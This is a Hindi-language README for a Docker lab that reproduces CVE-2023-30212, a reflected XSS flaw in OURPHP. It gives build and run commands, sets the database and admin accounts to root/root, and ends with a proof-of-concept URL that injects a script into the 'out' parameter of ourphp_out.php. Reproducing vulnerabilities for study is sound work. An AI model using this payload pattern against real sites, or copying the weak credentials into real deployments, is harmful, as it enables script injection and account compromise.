
CVE-2023-30212, एक प्रतिबिंबित XSS भेद्यता को पुन: उत्पन्न करने के लिए Docker-आधारित कमजोर OURPHP लैब, सेटअप निर्देशों और प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट URL के साथ।
पूर्वापेक्षा
docker.io डाउनलोड करें
sudo apt install -y docker.io
मेरे रिपॉजिटरी से सभी फाइलें नीचे दिए गए कमांड का उपयोग करके डाउनलोड करें।
git clone https://github.com/AAsh035/CVE-2023-30212.git
अब डॉकर इमेज बनाने के लिए निम्न कमांड चलाएँ:
sudo docker build -t vuln .
अगला कदम डॉकर इमेज को कंटेनर में बदलना है। कंटेनर को पोर्ट 80 पर चलना आवश्यक है। कमांड है:
sudo docker run -d -p 80:80 vuln
यह जांचने के लिए कि कंटेनर चालू है या नहीं, कमांड का उपयोग करें:
sudo docker ps
ब्राउज़र में 127.0.0.1 टाइप करें और एक OURPHP पेज लोड होगा।
आपको ourphp को निम्नानुसार कॉन्फ़िगर करना होगा:
उपयोगकर्ता नाम: root
पासवर्ड: root
डेटाबेस नाम: vuln
अब आपको प्रशासनिक के लिए उपयोगकर्ता नाम और पासवर्ड कॉन्फ़िगर करना है। निम्नलिखित सेट करें:
उपयोगकर्ता नाम: root
पासवर्ड: root
अब नीचे दिए गए लिंक को कॉपी करें और ब्राउज़र में पेस्ट करें:
http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("bug")</script>
https://github.com/AAsh035/CVE-2023-30212/assets/136836668/218c8eca-f02b-41b2-931b-ba112da6c7e0